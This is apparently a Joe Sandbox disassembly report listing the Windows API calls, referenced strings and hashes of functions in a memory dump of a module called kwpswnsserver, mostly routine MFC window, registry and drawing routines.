                                                                  • Opcode ID: 3aecc85989938fb4bb7245ba8b1429330b11481c64fbb7e3ecaca7860111ec5c
                                                                  • Instruction ID: 016e6f7748d21b7b75cd9accfa2b7c7b789bfd6612011c0c0667d1f4d7575a72
                                                                  • Opcode Fuzzy Hash: 3aecc85989938fb4bb7245ba8b1429330b11481c64fbb7e3ecaca7860111ec5c
                                                                  • Instruction Fuzzy Hash: 1911A275A14A3A6BDB325B28CD40BAE7635BF507A8F110720F81977BE0DF61DC1586D0
                                                                  APIs
                                                                  • IsWindow.USER32(00000000), ref: 6C888CE0
                                                                  • SendMessageW.USER32(?,00000455,00000000,00000000), ref: 6C888CF4
                                                                  • SendMessageW.USER32(?,00000454,00000000,00000000), ref: 6C888D07
                                                                  • SetWindowLongW.USER32(?,000000F0,?), ref: 6C888D26
                                                                  • SendMessageW.USER32(?,00000454,00000000,00000000), ref: 6C888D3C
                                                                    • Part of subcall function 6C89BA82: GetWindowLongW.USER32(F04D8BF4,000000F0), ref: 6C89BA8F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$Long
                                                                  • String ID:
                                                                  • API String ID: 3430364388-0
                                                                  • Opcode ID: ed3bf11aed56e20114e02c915d0a941f5fe87a151c64b86ad1aaf7a2c94b00ed
                                                                  • Instruction ID: b9d2b31a52e5665e4d9a9ab8c65ceb927fc2f41538a9d5ed7819c37ca98ea2a8
                                                                  • Opcode Fuzzy Hash: ed3bf11aed56e20114e02c915d0a941f5fe87a151c64b86ad1aaf7a2c94b00ed
                                                                  • Instruction Fuzzy Hash: BC11D671302710BBDB356B69CD08F5BBAB9FFC1B49F208A2AB11596AD0DB709800C760
                                                                  APIs
                                                                  • RegDeleteKeyW.ADVAPI32(00000000,?), ref: 6C89A947
                                                                  • RegDeleteValueW.ADVAPI32(00000000,?,?,00000000), ref: 6C89A967
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 6C89A998
                                                                    • Part of subcall function 6C89ACED: RegCloseKey.ADVAPI32(00000000,?,00000000), ref: 6C89AD92
                                                                    • Part of subcall function 6C89ACED: RegCloseKey.ADVAPI32(00000000,?,00000000), ref: 6C89ADA1
                                                                  • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,?,00000000,?,00000000), ref: 6C89A98F
                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6C89A9B3
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Close$DeleteValue$PrivateProfileStringWrite
                                                                  • String ID:
                                                                  • API String ID: 222425065-0
                                                                  • Opcode ID: 7bf117964404c14552727bd9c70bdcbe80436208388ae09ae7a93797d026225b
                                                                  • Instruction ID: 51c6b75aba13a30b04714128dd691d95ebdced657eb62e15ea6ddcefc77791a8
                                                                  • Opcode Fuzzy Hash: 7bf117964404c14552727bd9c70bdcbe80436208388ae09ae7a93797d026225b
                                                                  • Instruction Fuzzy Hash: 0D115437901626BFCB321F6D8D049DF3A69FF867A8B168924F9259A510DB31D412C6A0
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8B6713
                                                                  • GetWindowRect.USER32(00000000,00000000), ref: 6C8B675C
                                                                  • CreateRoundRectRgn.GDI32(00000000,00000000,00000001,?,00000004,00000004), ref: 6C8B6786
                                                                  • SetWindowRgn.USER32(00000000,?,00000000), ref: 6C8B679C
                                                                  • SetWindowRgn.USER32(00000000,00000000,00000000), ref: 6C8B67B4
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$CreateH_prolog3_Round
                                                                  • String ID:
                                                                  • API String ID: 2502471913-0
                                                                  • Opcode ID: b98d799dcdd8cc6bfb8480ff1bc4ce4246f7064b880a401b707dc6c5f9de4cee
                                                                  • Instruction ID: b2c3644f60ae0b26827fb596c4891dcf9dd44b7b11f4f39a99c139c777a9e592
                                                                  • Opcode Fuzzy Hash: b98d799dcdd8cc6bfb8480ff1bc4ce4246f7064b880a401b707dc6c5f9de4cee
                                                                  • Instruction Fuzzy Hash: A6116DB5A0061ADFDF19EFA8CD94AEDBB79FF09348F140229E505B2A50DB309C41CB64
                                                                  APIs
                                                                  • DrawThemeBackground.UXTHEME(00000000,?,00000001,00000000,?,00000000), ref: 6C8D0828
                                                                  • GetThemeColor.UXTHEME(00000000,00000001,00000000,00000EDB,?), ref: 6C8D083B
                                                                  • GetThemeColor.UXTHEME(00000000,00000001,00000000,00000EDF,?), ref: 6C8D0850
                                                                  • GetSysColorBrush.USER32(00000018), ref: 6C8D085A
                                                                  • FillRect.USER32(?,?,00000000), ref: 6C8D0871
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ColorTheme$BackgroundBrushDrawFillRect
                                                                  • String ID:
                                                                  • API String ID: 3021913306-0
                                                                  • Opcode ID: 74607421bcf658d3c40ae11bd051381464889ea1f0a87e67c5db91af92cf72fa
                                                                  • Instruction ID: 92d5ac3f3a95069edfa2914544a7dbf43607f7b68baf94b13a0b415714364e2c
                                                                  • Opcode Fuzzy Hash: 74607421bcf658d3c40ae11bd051381464889ea1f0a87e67c5db91af92cf72fa
                                                                  • Instruction Fuzzy Hash: FA11AC32650369FBDB248E44CD85F9A7778EB09B04F014919F60AE6480CBB1B841CB90
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 6C8C2EDF
                                                                  • ScreenToClient.USER32(?,?), ref: 6C8C2EEC
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8C2EFF
                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 6C8C2F21
                                                                  • SetCursor.USER32(?), ref: 6C8C2F3F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$ClientLoadRectScreen
                                                                  • String ID:
                                                                  • API String ID: 2747913190-0
                                                                  • Opcode ID: 7235b93082d1cf496928a43bd3e2a695fc0f4b5b6c99a383aefd83fda318918e
                                                                  • Instruction ID: 94f1ea8b3d7e124335c9f54ecfb04ab68c6fcb527acedd2df5aeeefa53dff96d
                                                                  • Opcode Fuzzy Hash: 7235b93082d1cf496928a43bd3e2a695fc0f4b5b6c99a383aefd83fda318918e
                                                                  • Instruction Fuzzy Hash: 70013975A0021EEFDF316FA9CD08DAE7FB8EF4935AB0085B5F409D2520EB7095119B61
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,?,00000367,00000367,00000003), ref: 6C8943D6
                                                                  • PostMessageW.USER32(?,00000367,00000000,00000000), ref: 6C8943E6
                                                                  • GetCapture.USER32 ref: 6C8943EC
                                                                  • ReleaseCapture.USER32 ref: 6C8943F8
                                                                  • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 6C89441F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Message$CapturePost$PeekRelease
                                                                  • String ID:
                                                                  • API String ID: 1125932295-0
                                                                  • Opcode ID: 2b71e893bd5fefb2755af0223605e0f1ae4eb185ca1d28fec5de1e7cfa487de1
                                                                  • Instruction ID: 459eb90437b9bee5a42bb0af1adf92c7f46315b5ea9c22d737cf40d850564b7b
                                                                  • Opcode Fuzzy Hash: 2b71e893bd5fefb2755af0223605e0f1ae4eb185ca1d28fec5de1e7cfa487de1
                                                                  • Instruction Fuzzy Hash: 06018F31201711ABEB312B398D59E5B7ABCFBC5B4DF008929F55AD1551EB719802CA60
                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 6C884A7A
                                                                    • Part of subcall function 6C8A0891: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 6C8A08D8
                                                                    • Part of subcall function 6C8A0891: CreatePatternBrush.GDI32(00000000), ref: 6C8A08E5
                                                                    • Part of subcall function 6C8A0891: DeleteObject.GDI32(00000000), ref: 6C8A08F1
                                                                  • SelectObject.GDI32(?,?), ref: 6C884A99
                                                                  • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 6C884ABE
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C884ACC
                                                                  • ReleaseDC.USER32(?,?), ref: 6C884AD8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Object$CreateSelect$BitmapBrushDeletePatternRelease
                                                                  • String ID:
                                                                  • API String ID: 2474928807-0
                                                                  • Opcode ID: fe220660f6fe127c2f7b7e014fff5bb33886cacdf704da6b814f66effa345cbb
                                                                  • Instruction ID: 55d26c670e9209ecd070d7b4a540316104c07d8dc5d2abd6f04919982af3a475
                                                                  • Opcode Fuzzy Hash: fe220660f6fe127c2f7b7e014fff5bb33886cacdf704da6b814f66effa345cbb
                                                                  • Instruction Fuzzy Hash: A5011A76200611AFCB25AFA9CE48C567FB9FF897483208568F51DC6921CB73D812DB64
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C89C591
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6C89C59C
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6C89C60A
                                                                    • Part of subcall function 6C89C493: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C89C4AB
                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 6C89C5B7
                                                                  • _Yarn.LIBCPMT ref: 6C89C5CD
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                  • String ID:
                                                                  • API String ID: 1088826258-0
                                                                  • Opcode ID: 4de0442620602df8a030d4760ca70143cf05a6ab1fcdfd1bb21243c78835891d
                                                                  • Instruction ID: 70ec1732836b939c0140bacc432df323a93f01ed2ed8418b9cd29d197cbcb9e8
                                                                  • Opcode Fuzzy Hash: 4de0442620602df8a030d4760ca70143cf05a6ab1fcdfd1bb21243c78835891d
                                                                  • Instruction Fuzzy Hash: B501F7717002169BCB1AEF28C9006BD7B71BF86244B548428D81167781DF75AE06CBC4
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: _strcspn
                                                                  • String ID: .$@
                                                                  • API String ID: 3709121408-1252397774
                                                                  • Opcode ID: 5b5c0aeb7539798b8cabc853dbfaffe544cf7e8d372c973811ded1e327be3f1f
                                                                  • Instruction ID: 9abc334ba8687da145c5c9b44670b8f5e7373459907644b61cb25161882631fa
                                                                  • Opcode Fuzzy Hash: 5b5c0aeb7539798b8cabc853dbfaffe544cf7e8d372c973811ded1e327be3f1f
                                                                  • Instruction Fuzzy Hash: 29324AB4904658CFCB65CF28C990ADDBBB1BF4A300F0085EAD849AB751DB749E94CF91
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C95E07D
                                                                    • Part of subcall function 6C95D1C2: __EH_prolog3.LIBCMT ref: 6C95D1C9
                                                                    • Part of subcall function 6C95D33F: __EH_prolog3.LIBCMT ref: 6C95D346
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3
                                                                  • String ID: DEFAULT$NORMAL$d
                                                                  • API String ID: 431132790-2951642190
                                                                  • Opcode ID: bd313a7e63aa8569b78fb2fc1f53ca477a5cc23d56d15f5cb474a07089648f09
                                                                  • Instruction ID: f28ca76cbc2e5d82ffa74e52cda197e9cc771bbfcfe64355b2b4782be9dca03e
                                                                  • Opcode Fuzzy Hash: bd313a7e63aa8569b78fb2fc1f53ca477a5cc23d56d15f5cb474a07089648f09
                                                                  • Instruction Fuzzy Hash: 9C8159B190126ADEDF14CFA8C951BEEBBB4BF11304F5044A9D418ABB50DB359A88CF60
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8B0BA9
                                                                    • Part of subcall function 6C8FE220: __EH_prolog3.LIBCMT ref: 6C8FE227
                                                                    • Part of subcall function 6C89BB93: GetDlgCtrlID.USER32(?), ref: 6C89BB9E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3$Ctrl
                                                                  • String ID: %TsMFCToolBar-%d$%TsMFCToolBar-%d%x$MFCToolBars
                                                                  • API String ID: 3879667756-2016111687
                                                                  • Opcode ID: 38cd27cff6d74fac42a900443c90563d4b1f2db8c07acd595f6b433e483b4935
                                                                  • Instruction ID: aeb06e20753b640f0a7a4d2b71fd4e1ec8394033f859a6d0bff77b209b62f803
                                                                  • Opcode Fuzzy Hash: 38cd27cff6d74fac42a900443c90563d4b1f2db8c07acd595f6b433e483b4935
                                                                  • Instruction Fuzzy Hash: 0021B471900219ABCF20DFA8CE94AFEB775BF45318F144D29E82177781EB70A905CBA0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CursorH_prolog3
                                                                  • String ID: Control Panel\Desktop$MenuShowDelay
                                                                  • API String ID: 634316419-702829638
                                                                  • Opcode ID: 46d36e4a24d3fbd4acdb55b63b38324ebc420f02dc8e5745620e3a165ff54f10
                                                                  • Instruction ID: 73a036edc0ec74f304cd7b01e1bb819bd1ac6f99ccfd662adec46d4d461f7cd1
                                                                  • Opcode Fuzzy Hash: 46d36e4a24d3fbd4acdb55b63b38324ebc420f02dc8e5745620e3a165ff54f10
                                                                  • Instruction Fuzzy Hash: 2F214171B0021ACFDF18DF64C9549BE7771BB44318B244929E925EB781EB309D45CB94
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8B0C87
                                                                    • Part of subcall function 6C8FE220: __EH_prolog3.LIBCMT ref: 6C8FE227
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3
                                                                  • String ID: %TsMFCToolBarParameters$LargeIcons$MFCToolBars
                                                                  • API String ID: 431132790-953485693
                                                                  • Opcode ID: b1f9202482b9267346385b5cda8f2bed5af557de5b60f50303834edc7e464fd1
                                                                  • Instruction ID: b396186859d85eeac409e75deb0b7e3dbbdc8b8ca063febd2b5bf44e2ecc8507
                                                                  • Opcode Fuzzy Hash: b1f9202482b9267346385b5cda8f2bed5af557de5b60f50303834edc7e464fd1
                                                                  • Instruction Fuzzy Hash: CC214174A0031A9FDF14DFA8C994AEEB771BF54308F144979E4127B781EB34A909CBA1
                                                                  APIs
                                                                    • Part of subcall function 6C88A57B: LoadLibraryW.KERNEL32(00000000,6CA42418,00000010,6C8A03E4,comctl32.dll,?), ref: 6C88A5BC
                                                                  • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 6C8A03F8
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 6C8A0444
                                                                    • Part of subcall function 6C89FFF7: GetLastError.KERNEL32(6C8A03EF,comctl32.dll,?,?,00001000,?,?,?), ref: 6C89FFF7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressErrorFreeLastLoadProc
                                                                  • String ID: DllGetVersion$comctl32.dll
                                                                  • API String ID: 2540614322-3857068685
                                                                  • Opcode ID: 59d8359a1639d75bb09b0ede33bec2b93c2a67b50a5a76adb8929661bd8d26aa
                                                                  • Instruction ID: e80e86a7d9e39d19611847183396a75027158fa7e4120178f3bda53bf45238b9
                                                                  • Opcode Fuzzy Hash: 59d8359a1639d75bb09b0ede33bec2b93c2a67b50a5a76adb8929661bd8d26aa
                                                                  • Instruction Fuzzy Hash: DC110175A0121A9FCB209FA8C854BDE77F4BF85319F004428E906EB340DB34C9068BA2
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C89F001
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 6C89F025
                                                                  • GetClassInfoW.USER32(?,?,?), ref: 6C89F060
                                                                    • Part of subcall function 6C88F6D4: __EH_prolog3_catch.LIBCMT ref: 6C88F6DB
                                                                    • Part of subcall function 6C88F6D4: GetClassInfoW.USER32(?,?,?), ref: 6C88F6ED
                                                                  Strings
                                                                  Memory Dump Source
